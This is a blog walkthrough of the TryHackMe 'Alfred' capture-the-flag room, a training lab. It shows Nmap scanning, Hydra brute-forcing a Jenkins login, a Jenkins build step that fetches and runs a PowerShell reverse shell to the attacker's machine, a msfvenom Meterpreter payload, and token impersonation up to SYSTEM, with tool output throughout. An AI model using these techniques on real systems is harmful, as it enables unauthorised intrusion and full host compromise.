alfred - d3adair.xyz

![[alfred 2.png]] # TryHackMe Walkthrough CTF Part of the **Offensive Pentesting** learning path. ## Room Link: https://tryhackme.com/r/room/alfred ## Initial Access Initial Nmap scan. ```bash root@ip-10-10-244-40:~# nmap -T4 -n -sC -sV -Pn -p- 10.10.175.217 Starting Nmap 7.60 ( https://nmap.org ) at 2024-11-12 04:57 GMT Nmap scan report for 10.10.175.217 Host is up (0.00057s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site doesn't have a title (text/html). 3389/tcp open ms-wbt-server Microsoft Terminal Service | ssl-cert: Subject: commonName=alfred | Not valid before: 2024-11-11T04:53:01 |_Not valid after: 2025-05-13T04:53:01 |_ssl-date: 2024-11-12T05:09:10+00:00; -2s from scanner time. 8080/tcp open http Jetty 9.4.z-SNAPSHOT | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site doesn't have a title (text/html;charset=utf-8). MAC Address: 02:BB:32:CE:1B:73 (Unknown) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -2s, deviation: 0s, median: -2s ``` **How many ports are open? (TCP only)** From our initial scan we can see there are a few interesting things to take note of. Firstly, there a few different open ports that we are presented with. We know this is a Windows machine due to the OS fingerprinting and due to there being a MS Terminal Service (RDP/RDS) running on Port 3389. We also wee that the *TRACE* HTTP method is allowed for the web server running on Port 80 which could potentially lead to a **Cross-Site Tracing (XST)** attack which is a form of **Cross-Site Scripting (XSS)** attack against the TRACE HTTP method. https://owasp.org/www-community/attacks/Cross_Site_Tracing Visiting the webpage hosted on Port 80 we are greeted with what appears to be an obituary for Batm- I mean Bruce Wayne, who is definitely just a billionaire and not the caped crusader. Let's see what is being hosted on Port 8080. ![[webpage.png]] This is more like it, we are redirected to a login page hosting an application apparently called **Jenkins**. ![[login.png]] Having no other clues to go off, my first idea was to attempt to brute force the login page using **Hydra**. We know that *alfred* appears to have an account due to the email contact listed on the initial webpage. To confirm what form of request we will be making to the login page we will use **BurpSuite** to intercept the login request. ![[burp.png]] We can see the request being made and we will attempt to run a Hydra brute-force login attempt with the **alfred** username. ```bash root@ip-10-10-244-40:~# hydra -s 8080 -L /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/common-passwords-win.txt 10.10.175.217 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in: Invalid username or password' -f ``` This ended up failing unfortunately and so I just tried using two separate username and password lists to see if we could get a valid logon pair. I am using the `top-username-shortlist.txt` and the `common-passwords-win.txt` files as my username and password files respectively. ```shell root@ip-10-10-244-40:# hydra -s 8080 -L /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/common-passwords-win.txt 10.10.175.217 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in: Invalid username or password' -f Hydra (http://www.thc.org/thc-hydra) starting at 2024-11-14 03:18:08 [DATA] max 16 tasks per 1 server, overall 16 tasks, 425 login tries (l:17/p:25), ~27 tries per task [DATA] attacking http-post-form://10.10.175.217:8080/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in: Invalid username or password [8080][http-post-form] host: 10.10.175.217 login: admin password: admin [STATUS] attack finished for 10.10.175.217 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2024-11-14 03:18:10 ``` **What is the username and password for the login panel? (in the format username:password)** Looks like we have our pair with `admin:admin` so that's good to see. We probably didn't need to use Hydra as there is a strong possibility that `admin:admin` is the default credential pair for Jenkins and us finding that out was probably only a Google search away but it is never a bad thing to get some Hydra practice in. ![[alf4.png]] We have successfully logged into the Jenkins admin panel. Our next step is to use a tool or a functionality within Jenkins that will allow us to execute commands on the server and potentially create a reverse shell. The instructions in the walkthrough point us to a specific PowerShell script called `Invoke-PowershellTCP.ps1` that we will need to download to our attacker machine and then serve over a web server using Python. We will then execute a command through Jenkins which will download and execute our PowerShell script on the server and create a reverse shell connecting back to our attacking machine. Now I know that was a lot, but let's go ahead and see what it looks like when we do it step-by-step. First, lets start off by downloading the PowerShell script from the GitHub repository it's hosted on. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 From here, move it to the directory that you like and start a Python web server on whichever port you'd like. I just use the default 8000 port to make things easier. ![[alf5.png]] Now we need to copy the command provided to us by the room author and modify it to fit our needs. Firstly, we need to change the download location to our IP address and port where the PowerShell script is being served by the Python HTTP server. Then, we need to add our IP address and a specific port of your choosing that will be the port that our Netcat reverse shell is listening on. In my case I went with Port 1337 as you can see below. You can create a simple Netcat reverse shell with the following command: `nc -lvnp PORT` ![[alf6.png]] Once we have the command modified to download the script from our machine and connect back to our machine on the port that our Netcat reverse shell is listening on, click "Apply" and "Save" and go back to the main page. ![[alf10.png]] From the main admin panel, our next step is to build the project which will then execute the command we have entered and save and *fingers crossed* will result in a reverse shell. ![[alf7.png]] The command we entered successfully downloaded our script with the user account `bruce` on the system `ALFRED`. Looking good so far! ![[alf8.png]] And there we have it! The command was a success and we received a reverse shell from `ALFRED` running under the `bruce` user account. **What is the user.txt flag?** Let's check out the `bruce` account's Desktop...that is usually where we can find a user.txt flag. ![[alf9 1.png]] And voila! Looks like our intuition was correct. Our next step is to try and escalate our privileges on `ALFRED` using Metasploit. ## Switching Shells **What is the final size of the exe payload that you generated?** Now we copy the msfvenom command provided to us by the author and modify it to set our attacker machine IP as LHOST and the port we want to receive a connection on to LPORT. ![[alf11.png]] Msfvenom is MetaSploit's custom payload generation tool. The command looks complicated at first but once we understand the syntax and the flags it becomes much easier to understand. | **SWITCH** | **PURPOSE** | | ---------- | ------------------------------------------ | | -p | Specifying the payload type. | | -a | Specifying the payload architecture. | | -f | Specifying the payload format. | | -o | Specifying the payload name and saving it. | There are some other helpful commands like `msfvenom --list formats` which will provide us with a list of all the available payload formats that we can choose from. ```bash msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target View the full module info with the info, or info -d command. msf6 exploit(multi/handler) > set LHOST 10.10.2.79 LHOST => 10.10.2.79 msf6 exploit(multi/handler) > ``` We already have the port configured correctly but if you set the LPORT= option to a different port when generating your msfvenom payload make sure to change it to that port in the MetaSploit payload options. Now, there are a few different ways we could go about this next step, but the easiest for me was to again use the Jenkins Project build functionality to download our msfvenom payload to the server and then execute it using our previous shell running under the bruce account. Go ahead and create a new project in Jenkins. We need to do this because the original project is hung due to our reverse shell and if we kill the build process we will lose our initial shell that we need to execute the msfvenom payload. Once you have a new project created, copy the command provided by the room author and modify to your attacker machine's IP. Make sure you have the name of your msfvenom payload spelled correctly and that you are running your Python HTTP server in the directory that it is located in. ![[alf12.png]] Now, from our shell as bruce, we will execute the msfvenom payload that we just downloaded and hopefully receive a connection to our listener in Metasploit. ![[alf13 1.png]] Yes! Looks like we configured the payload correctly and had our MetaSploit options set correctly. Now we move on to privilege escalation... ![[alf14.png]] ## Privilege Escalation The privilege escalation path in this room involves the token impersonation technique. The room author provided some reading material if you are unfamiliar with this technique. https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens https://www.exploit-db.com/papers/42556 Within Windows, there is a laundry list of privileges that allow users to execute specific actions on the machine. However, a handful of these privileges can be abused by attackers to carry out malicious actions on the victim's machine. I provided some additional documentation and reading below from Windows and HackTricks to give you a better understanding of what this attack is leveraging. https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/access-tokens https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens - SeImpersonatePrivilege - SeAssignPrimaryPrivilege - SeTcbPrivilege - SeBackupPrivilege - SeRestorePrivilege - SeCreateTokenPrivilege - SeLoadDriverPrivilege - SeTakeOwnershipPrivilege - SeDebugPrivilege The room author provides us with a list of some of the more commonly abused privileges, and they line up with the privileges we see listed on the HackTricks entry for token abuse. Let's see if there are any of these privileges assigned to the `bruce` user that we can possibly take advantage of. ![[alf15.png]] Looks like there are a few of these listed privileges assigned to the `bruce` user. We are now tasked with loading `incognito` into Meterpreter which is a module that will assist us with our token impersonation attack. You can read more about incognito on OffSec's website. https://www.offsec.com/metasploit-unleashed/fun-incognito/ ```bash C:\Program Files (x86)\Jenkins\workspace\project>exit exit meterpreter > load incognito Loading extension incognito...Success. meterpreter > list_tokens -g [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM Delegation Tokens Available ======================================== \ BUILTIN\Administrators BUILTIN\Users NT AUTHORITY\Authenticated Users NT AUTHORITY\NTLM Authentication NT AUTHORITY\SERVICE NT AUTHORITY\This Organization NT SERVICE\AudioEndpointBuilder NT SERVICE\CertPropSvc NT SERVICE\CscService NT SERVICE\iphlpsvc NT SERVICE\LanmanServer NT SERVICE\PcaSvc NT SERVICE\Schedule NT SERVICE\SENS NT SERVICE\SessionEnv NT SERVICE\TrkWks NT SERVICE\UmRdpService NT SERVICE\UxSms NT SERVICE\Winmgmt NT SERVICE\wuauserv Impersonation Tokens Available ======================================== No tokens available ``` Once we have incognito loaded and we have a list of the available tokens, we can see that the `BUILTIN\Administrators` account token is available for us to impersonate. We can do this by running the following command and confirming that it was successful by running the `getuid` command within Meterpreter. ```bash meterpreter > impersonate_token "BUILTIN\Administrators" [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM [+] Delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEM meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` Display the running processes on `ALFRED` via Meterpreter by running the `ps` command and looking for a specific process that you wish to migrate to. We are told to migrate to the services.exe but there are a few others that we could theoretically choose to migrate to. ```bash meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 396 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 524 516 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 572 564 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 580 516 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe 608 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe 668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe 676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 684 580 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe 712 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe 772 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 848 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 864 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 924 608 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe 936 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 976 2744 SearchProtocolHost.e x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchProtocolHost.exe xe 984 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1012 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1056 2744 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchFilterHost.exe 1068 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1208 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1240 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1356 668 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agen t.exe 1436 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1460 668 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent. exe 1488 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1592 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1608 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1644 668 jenkins.exe x64 0 alfred\bruce C:\Program Files (x86)\Jenkins\jenkins.exe 1712 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1832 1644 java.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\jre\bin\java .exe 1844 668 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec 2Config.exe 1944 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe 2368 772 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe 2744 668 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe 2860 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe 2868 2880 seashell.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\workspace\pr oject\seashell.exe 2880 2948 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ powershell.exe 2948 1832 cmd.exe x86 0 alfred\bruce C:\Windows\SysWOW64\cmd.exe 3036 668 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe meterpreter > ``` Use the migrate command with the PID of the services.exe process and confirm that the migration was successful by running the geptid command. ```bash meterpreter > migrate 668 [*] Migrating from 2868 to 668... [*] Migration completed successfully. meterpreter > getpid Current pid: 668 ``` We have successfully migrated to the services.exe process and confirmed that by running the getpid command. Our final step is to grab that root flag and after that we are donezo. ```bash meterpreter > cat root.txt ``` If you have any issues displaying the contents of the root flag via Meterpreter like I did, try dropping back into a regular Windows shell and displaying the contents with the `type` command. Once you have the flag go ahead and drop that sucker into the answer box and pat yourself on the back! Another one down and we are on to the next. I will see you there!